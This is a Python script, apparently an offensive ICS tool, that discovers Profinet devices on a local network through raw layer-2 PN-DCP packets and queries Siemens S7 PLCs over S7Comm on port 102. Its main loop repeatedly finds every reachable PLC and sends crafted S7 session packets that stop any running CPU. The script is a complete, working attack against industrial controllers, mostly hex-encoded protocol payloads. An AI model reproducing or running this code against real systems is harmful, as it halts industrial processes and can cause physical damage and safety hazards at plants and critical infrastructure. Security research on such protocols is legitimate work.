#! /usr/bin/env python3 r""" Copyright 2022 Photubias(c) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WAR RANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . (Buggy) Linux implementation of this script: https://code.google.com/p/scada-tools/ python profinet_scanner.py [-i interface] DLL Library import based on: https://code.google.com/p/winpcapy/ Prerequisites: WinPcap (Windows) or libpcap (Linux) installed File name SiemensScan.py written by tijl[dot]deneut[at]howest[dot]be for IC4 --- Profinet Scanner --- It will perform a Layer2 discovery scan (PN_DCP) for Profinet devices, then list their info (detected only via DCP) Then give you the option to change network settings for any of them --- Siemens Hacker --- It also performs detailed scanning using S7Comm. Furthermore, this script reads inputs AND writes & reads outputs. """ import os import re import socket import string import struct import sys import time from binascii import hexlify, unhexlify from ctypes import CDLL, POINTER, Structure, c_void_p, c_char_p, c_ushort, c_char, c_long, c_int, c_ubyte, \ byref, create_string_buffer from ctypes.util import find_library from multiprocessing.pool import ThreadPool from pprint import pprint from subprocess import Popen, PIPE ##### Classes class Sockaddr(Structure): _fields_ = [("sa_family", c_ushort), ("sa_data", c_char * 14)] class PcapAddr(Structure): pass PcapAddr._fields_ = [('next', POINTER(PcapAddr)), ('addr', POINTER(Sockaddr)), ('netmask', POINTER(Sockaddr)), ('broadaddr', POINTER(Sockaddr)), ('dstaddr', POINTER(Sockaddr))] class PcapIf(Structure): pass PcapIf._fields_ = [('next', POINTER(PcapIf)), ('name', c_char_p), ('description', c_char_p), ('addresses', POINTER(PcapAddr)), ('flags', c_int)] class Timeval(Structure): pass Timeval._fields_ = [('tv_sec', c_long), ('tv_usec', c_long)] class PcapPkthdr(Structure): _fields_ = [('ts', Timeval), ('caplen', c_int), ('len', c_int)] ##### Initialize Pcap if os.name == 'nt': try: os.chdir('C:/Windows/System32/Npcap') _lib = CDLL('wpcap.dll') except: print('Error: WinPcap/Npcap not found!') print('Please download here: https://nmap.org/npcap/') input('Press [Enter] to close') sys.exit(1) else: pcaplibrary = find_library('pcap') if pcaplibrary is None or str(pcaplibrary) == '': print('Error: Pcap library not found!') print('Please install with: e.g. apt install libpcap0.8') input('Press [Enter] to close') sys.exit(1) _lib = CDLL(pcaplibrary) ## match DLL function to list all devices pcap_findalldevs = _lib.pcap_findalldevs pcap_findalldevs.restype = c_int pcap_findalldevs.argtypes = [POINTER(POINTER(PcapIf)), c_char_p] ## match DLL function to open a device: char *device, int snaplen, int prmisc, int to_ms, char *ebuf ## snaplen - maximum size of packets to capture in bytes ## promisc - set card in promiscuous mode? ## to_ms - time to wait for packets in miliseconds before read times out ## errbuf - if something happens, place error string here pcap_open_live = _lib.pcap_open_live pcap_open_live.restype = POINTER(c_void_p) pcap_open_live.argtypes = [c_char_p, c_int, c_int, c_int, c_char_p] ## match DLL function to send a raw packet: pcap device handle, packetdata, packetlength pcap_sendpacket = _lib.pcap_sendpacket pcap_sendpacket.restype = c_int pcap_sendpacket.argtypes = [POINTER(c_void_p), POINTER(c_ubyte), c_int] ## match DLL function to close a device pcap_close = _lib.pcap_close pcap_close.restype = None pcap_close.argtypes = [POINTER(c_void_p)] ## match DLL function to get error message pcap_geterr = _lib.pcap_geterr pcap_geterr.restype = c_char_p pcap_geterr.argtypes = [POINTER(c_void_p)] ## match DLL function to get next packet pcap_next_ex = _lib.pcap_next_ex pcap_next_ex.restype = c_int pcap_next_ex.argtypes = [POINTER(c_void_p), POINTER(POINTER(PcapPkthdr)), POINTER(POINTER(c_ubyte))] ##### Variables iDiscoverTimeout = 2 ##### Functions def get_all_interfaces(): def add_to_arr(array, adapter, ip, mac, device, winguid): if len(mac) == 17: # When no or bad MAC address (e.g. PPP adapter), do not add array.append([adapter, ip, mac, device, winguid]) return array # Returns twodimensional array of interfaces in this sequence for each interface: # [0] = adaptername (e.g. Ethernet or eth0) # [1] = Current IP (e.g. 192.168.0.2) # [2] = Current MAC (e.g. ff:ee:dd:cc:bb:aa) # [3] = Devicename (e.g. Intel 82575LM, Windows only) # [4] = DeviceGUID (e.g. {875F7EDB-CA23-435E-8E9E-DFC9E3314C55}, Windows only) interfaces = [] if os.name == 'nt': # This should work on Windows proc = Popen("getmac /NH /V /FO csv | FINDSTR /V disconnected", shell=True, stdout=PIPE) for interface in proc.stdout.readlines(): intarr = interface.decode().split(',') adapter = intarr[0].replace('"', '') devicename = intarr[1].replace('"', '') mac = intarr[2].replace('"', '').lower().replace('-', ':') winguid = intarr[3].replace('"', '').replace('\n', '').replace('\r', '')[-38:] proc = Popen('netsh int ip show addr "' + adapter + '" | FINDSTR /I IP', shell=True, stdout=PIPE) try: ip = re.findall(r'[0-9]+(?:\.[0-9]+){3}', proc.stdout.readlines()[0].decode(errors='ignore').replace(' ', ''))[0] except: ip = '' interfaces = add_to_arr(interfaces, adapter, ip, mac, devicename, winguid) else: # And this on any Linux # proc=Popen("for i in `ifconfig -a | grep \"Link encap:\" | awk '{print $1}'`;do echo \"$i `ifconfig $i | sed 's/inet addr:/inet addr: /' | grep \"inet addr:\" | awk '{print $3}'` `ifconfig $i | grep HWaddr | awk '{print $5}'`\" | sed '/lo/d';done", shell=True, stdout=PIPE) proc = Popen( "for i in $(ip address | grep -v \"lo\" | grep \"default\" | cut -d\":\" -f2 | cut -d\" \" -f2);do echo $i $(ip address show dev $i | grep \"inet \" | cut -d\" \" -f6 | cut -d\"/\" -f1) $(ip address show dev $i | grep \"ether\" | cut -d\" \" -f6);done", shell=True, stdout=PIPE) for interface in proc.stdout.readlines(): intarr = interface.decode().split(' ') if len(intarr) < 3: continue ## Device has no MAC address, L2 scanning not an option interfaces = add_to_arr(interfaces, intarr[0], intarr[1], intarr[2].replace('\n', ''), '', '') return interfaces ## Expects sData like this 01020304050607 and returns bytearray def create_packet(s_data): b_hex_data = unhexlify(s_data) arr_byte_packet = (c_ubyte * len(b_hex_data))() b = bytearray() b.extend(b_hex_data) for i in range(0, len(b_hex_data)): arr_byte_packet[i] = b[i] return arr_byte_packet ## Actually sends a packet def send_raw_packet(b_npfdevice, s_ethertype, s_srcmac, bool_set_network=False, s_network_data_to_set='', s_dstmac=''): if s_ethertype == '88cc': # LLDP Packet s_dstmac = '0180c200000e' s_data = '0210077365727665722d6e6574776f726b6d040907706f72742d303031060200140a0f5345525645522d4e4554574f524b4d0c60564d776172652c20496e632e20564d77617265205669727475616c20506c6174666f726d2c4e6f6e652c564d776172652d34322033362036642039622034302062642038642038302d66302037362061312066302035332030392039352032370e040080008010140501ac101e660200000001082b0601040181c06efe08000ecf0200000000fe0a000ecf05005056b6feb6fe0900120f0103ec0300000000' elif s_ethertype == '8100': # PN-DCP, Profinet Discovery Packet, sEthertype '8100' s_dstmac = '010ecf000000' s_data = '00008892fefe05000400000300800004ffff00000000000000000000000000000000000000000000000000000000' elif s_ethertype == '8892' and bool_set_network: ## Create packet to set networkdata, expect data in hexstring s_data = ( 'fefd 04 00 04000001 0000 0012 0102 000e 0001' + s_network_data_to_set + '0000 0000 0000 0000 0000 0000').replace( ' ', '') # Working elif s_ethertype == '8892' and not bool_set_network: ## Create custom packet with 'networkDataToSet' as the data (including length) and dstmac as dstmac s_data = s_network_data_to_set ## Get packet as a bytearray arr_byte_packet = create_packet(s_dstmac + s_srcmac + s_ethertype + s_data) ## Send the packet buf_errbuf = create_string_buffer(256) handle_pcap_dev = pcap_open_live(b_npfdevice, 65535, 1, 1000, buf_errbuf) ## Device, max packet size, promiscuous mode, time limit in ms, buffer for errors if not bool(handle_pcap_dev): print('\nError: Please use sudo!\n') # else: print('\nUnable to open the adapter. %s is not supported by Pcap\n' % interfaces[int(answer - 1)][0]) sys.exit(1) if pcap_sendpacket(handle_pcap_dev, arr_byte_packet, len(arr_byte_packet)) != 0: print('\nError sending the packet: %s\n' % pcap_geterr(handle_pcap_dev)) sys.exit(1) pcap_close(handle_pcap_dev) return arr_byte_packet ## Receive packets, expect device to receive on, src mac address + ethertype to filter on and timeout in seconds def receive_raw_packets(b_npfdevice, i_timeout, s_srcmac, s_ethertype, stop_on_receive=False): arr_received_raw_data = [] buf_errbuf = create_string_buffer(256) handle_pcap_dev = pcap_open_live(b_npfdevice, 65535, 1, 1000, buf_errbuf) ## Device, max packet size, promiscuous mode, time limit in ms, buffer for errors if not bool(handle_pcap_dev): print('\nUnable to open the adapter. {} is not supported by Pcap\n'.format(b_npfdevice)) sys.exit(1) ptr_header = POINTER(PcapPkthdr)() ptr_pkt_data = POINTER(c_ubyte)() i_receivedpacket = pcap_next_ex(handle_pcap_dev, byref(ptr_header), byref(ptr_pkt_data)) ## Regular handler, loop until told otherwise (or with timer) fl_timer = time.time() + int(i_timeout) i = 0 while i_receivedpacket >= 0: i_timeleft = int(round(fl_timer - time.time(), 0)) status('Received packets: %s, time left: %i \r' % (str(i), i_timeleft)) if i_timeleft <= 0: break ## PCAP networkstack timeout elapsed or regular timeout lst_rawdata = ptr_pkt_data[0:ptr_header.contents.len] s_packettype = hexlify(bytearray(lst_rawdata[12:14])).decode().lower() s_targetmac = hexlify(bytearray(lst_rawdata[:6])).decode().lower() if s_packettype == s_ethertype.lower() and s_srcmac.lower() == s_targetmac: # print('Succes! Found an %s packet.' % sEthertype) arr_received_raw_data.append(lst_rawdata) if stop_on_receive: break ## Load next packet i_receivedpacket = pcap_next_ex(handle_pcap_dev, byref(ptr_header), byref(ptr_pkt_data)) i += 1 pcap_close(handle_pcap_dev) return arr_received_raw_data ## Parsing the Raw PN_DCP data on discovery (source: https://code.google.com/p/scada-tools/source/browse/profinet_scanner.py) ## Returns type_of_station, name_of_station, vendor_id, device_id, device_role, ip_address, subnet_mask, standard_gateway def parse_response(s_hexdata, s_mac): arr_device = { 'mac_address': s_mac, 'type_of_station': 'None', 'name_of_station': 'None', 'vendor_id': 'None', 'device_id': 'None', 'device_role': 'None', 'ip_address': 'None', 'subnet_mask': 'None', 'standard_gateway': 'None', 'hardware': None, 'firmware': None, } ## Since this is the parse of a DCP identify response, data should start with feff (Profinet FrameID 0xFEFF) if not str(s_hexdata[:4]).lower() == 'feff': print('Error: this data is not a proper DCP response?') return arr_device data_to_parse = s_hexdata[24:] # (Static) offset to where first block starts while len(data_to_parse) > 0: ## Data is divided into blocks, where block length is set at byte 2 & 3 (so offset [4:8]) of the block block_length = int(data_to_parse[2 * 2:4 * 2], 16) block = data_to_parse[:(4 + block_length) * 2] ## Parse the block block_id = str(block[:2 * 2]) if block_id == '0201': arr_device['type_of_station'] = str(unhexlify(block[4 * 2:4 * 2 + block_length * 2]))[2:-1].replace(r'\x00', '') elif block_id == '0202': arr_device['name_of_station'] = str(unhexlify(block[4 * 2:4 * 2 + block_length * 2]))[2:-1].replace(r'\x00', '') elif block_id == '0203': arr_device['vendor_id'] = str(block[6 * 2:8 * 2]) arr_device['device_id'] = str(block[8 * 2:10 * 2]) elif block_id == '0204': arr_device['device_role'] = str(block[6 * 2:7 * 2]) devrole = '' elif block_id == '0102': arr_device['ip_address'] = socket.inet_ntoa(struct.pack(">L", int(block[6 * 2:10 * 2], 16))) arr_device['subnet_mask'] = socket.inet_ntoa(struct.pack(">L", int(block[10 * 2:14 * 2], 16))) arr_device['standard_gateway'] = socket.inet_ntoa(struct.pack(">L", int(block[14 * 2:18 * 2], 16))) ## Maintain the loop padding = block_length % 2 # Will return 1 if odd data_to_parse = data_to_parse[(4 + block_length + padding) * 2:] return arr_device def status(msg): sys.stderr.write(msg) sys.stderr.flush() def send_and_recv(sock, strdata, sendOnly=False): data = unhexlify(strdata.replace(' ', '').lower()) ## Convert to real HEX (\x00\x00 ...) sock.send(data) if sendOnly: return ret = sock.recv(65000) return ret def get_cpu(device): s_statee = 'Running' sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(1) # 1 second timeout try: sock.connect((device['ip_address'], 102)) ## Will setup TCP/SYN with port 102 except: return 'Unknown' # Firstly: the COTP Connection Request (CR), should result in Connection Confirm (CC) ## TPKT header + COTP CR TPDU with src-ref 0x0005 (gets response with dst-ref 0x0005) cotpconnectresponse = hexlify(send_and_recv(sock, '03000016' + '11e00000001d00c1020100c2020100c0010a')).decode( errors='ignore') ## Response should be 03000016 11d00005001000c0010ac1020600c2020600 if not cotpconnectresponse[10:12] == 'd0': print('COTP Connection Request failed') return '' ##---- S7 Setup Comm ------------ ## TPKT header + COTP header + S7 data (which is: Header -Job- + Parameter -Setup-) s7setupdata = '32010000020000080000' + 'f0000001000101e0' tpktlength = str(hex(int((len(s7setupdata) + 14) / 2)))[2:] s7setup = send_and_recv(sock, '030000' + tpktlength + '02f080' + s7setupdata) ##---- S7 Request CPU ----------- s7readdata = '3207000005000008 000800011204 11440100ff09000404240001' tpktlength = str(hex(int((len(s7readdata.replace(' ', '')) + 14) / 2)))[2:] s7read = send_and_recv(sock, '030000' + tpktlength + '02f080' + s7readdata) if hexlify(s7read[44:45]).decode(errors='ignore') == '03': s_statee = 'Stopped' sock.close() return s_statee def change_cpu(device): cur_state = get_cpu(device) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(1) sock.connect((device['ip_address'], 102)) ## Will setup TCP/SYN with port 102 ## CR TPDU send_and_recv(sock, '03000016' + '11e00000002500c1020600c2020600c0010a') ## 'SubscriptionContainer' sResp = hexlify(send_and_recv(sock, '030000c0' + '02f080' + '720100b131000004ca0000000200000120360000011d00040000000000a1000000d3821f0000a3816900151653657276657253657373696f6e5f4536463534383534a3822100150b313a3a3a362e303a3a3a12a3822800150d4f4d532b204465627567676572a38229001500a3822a001500a3822b00048480808000a3822c001211e1a300a3822d001500a1000000d3817f0000a38169001515537562736372697074696f6e436f6e7461696e6572a2a20000000072010000')).decode( errors='ignore') s_sid = str(hex(int('0' + sResp[48:50], 16) + int('80', 16))).replace('0x', '') if len(s_sid) % 2 == 1: s_sid = '0' + s_sid # print('Using SID ' + sSID) if cur_state == 'Stopped': ## Will perform start send_and_recv(sock, '03000078' + '02f080' + '72020069310000054200000003000003' + s_sid + '34000003 ce 010182320100170000013a823b00048140823c00048140823d000400823e00048480c040823f0015008240001506323b313035388241000300030000000004e88969001200000000896a001300896b000400000000000072020000') else: send_and_recv(sock, '03000078' + '02f080' + '72020069310000054200000003000003' + s_sid + '34000003 88 010182320100170000013a823b00048140823c00048140823d000400823e00048480c040823f0015008240001506323b313035388241000300030000000004e88969001200000000896a001300896b000400000000000072020000') send_and_recv(sock, '0300002b' + '02f080' + '7202001c31000004bb00000005000003' + s_sid + '34000000010000000000000000000072020000') send_and_recv(sock, '0300002b' + '02f080' + '7202001c31000004bb00000006000003' + s_sid + '34000000020001010000000000000072020000') runloop = True print('--- Getting data ---') while runloop: try: response = sock.recv(65000) except: runloop = False try: send_and_recv(sock, '03000042' + '02f080' + '7202003331000004fc00000007000003' + s_sid + '360000003402913d9b1e000004e88969001200000000896a001300896b00040000000000000072020000') except: sock.close() return False if cur_state == 'Stopped': ## Will perform start send_and_recv(sock, '03000043' + '02f080' + '7202003431000004f200000008000003' + s_sid + '36000000340190770008 03 000004e88969001200000000896a001300896b00040000000000000072020000') else: send_and_recv(sock, '03000043' + '02f080' + '7202003431000004f200000008000003' + s_sid + '36000000340190770008 01 000004e88969001200000000896a001300896b00040000000000000072020000') send_and_recv(sock, '0300003d' + '02f080' + '7202002e31000004d40000000a000003' + s_sid + '34000003d000000004e88969001200000000896a001300896b000400000000000072020000') sock.close() return True def scan_network(s_adapter, s_macaddr, s_winguid): ## We use Pcap, so we need the Pcap device (for Windows: \Device\NPF_{GUID}, for Linux: 'eth0') if os.name == 'nt': s_adapter = r'\Device\NPF_' + s_winguid # print('Using adapter ' + sAdapter + '\n') b_npfdevice = s_adapter.encode() ## Start building discovery packet print('Building packet') ## Sending the raw packet (packet itself is returned) (8100 == PN_DCP, 88cc == LDP) packet = send_raw_packet(b_npfdevice, '8100', s_macaddr) print('\nPacket has been sent (' + str(len(packet)) + ' bytes)') ## Receiving packets as bytearr (88cc == LDP, 8892 == device PN_DCP) print('\nReceiving packets over ' + str(iDiscoverTimeout) + ' seconds ...\n') received_data_arr = receive_raw_packets(b_npfdevice, iDiscoverTimeout, s_macaddr, '8892') print() print('\nSaved ' + str(len(received_data_arr)) + ' packets') print() return received_data_arr, b_npfdevice def parse_data(received_data_arr): # print('These are the devices detected ({}):'.format(len(receivedDataArr))) # print('{0:17} | {1:20} | {2:20} | {3:15} | {4:9}'.format('MAC address', 'Device', 'Device Type', 'IP Address', 'Vendor ID')) lst_devices = [] for packet in received_data_arr: s_hexdata = hexlify(bytearray(packet))[28:].decode(errors='ignore') # take off ethernet header ## Parse function returns type_of_station, name_of_station, vendor_id, device_id, device_role, ip_address, subnet_mask, standard_gateway ## takes 'translate' as a parameter, which will add these parsings: ## (vendor id 002a == siemens) (device id 0a01=switch, 0202=simulator, 0203=s7-300 CP, 0101=s7-300 ...) ## (0x01==IO-Device, 0x02==IO-Controller, 0x04==IO-Multidevice, 0x08==PN-Supervisor), (0000 0001, 0000 0010, 0000 0100, 0000 1000) ## Getting MAC address from packet, formatting with ':' in between s_mac = ':'.join(re.findall('(?s).{,2}', str(hexlify(bytearray(packet)).decode(errors='ignore')[6 * 2:12 * 2])))[ :-1] arr_result = parse_response(s_hexdata, s_mac) lst_devices.append(arr_result) # sDevicename = str(arrResult['name_of_station']) # if sDevicename == '': sDevicename = str(arrResult['type_of_station']) # print('{0:17} | {1:20} | {2:20} | {3:15} | {4:9}'.format(sMac, sDevicename, arrResult['type_of_station'], arrResult['ip_address'], arrResult['vendor_id'])) return lst_devices def main(): interfaces = get_all_interfaces() s_adapter = interfaces[0][0] # eg: 'Ethernet 2' s_macaddr = interfaces[0][2].replace(':', '') # eg: 'ab58e0ff585a' s_winguid = interfaces[0][4] # eg: '{875F7EDB-CA23-435E-8E9E-DFC9E3314C55}' while True: received_data_arr, b_npfdevice = scan_network(s_adapter, s_macaddr, s_winguid) lst_devices = parse_data(received_data_arr) print(f"Found {len(lst_devices)} devices") for lst_device in lst_devices: pprint(lst_device) print("Stopping all CPUs") for device in lst_devices: current_state = get_cpu(device) if current_state == 'Running': change_cpu(device) time.sleep(5) if __name__ == '__main__': main()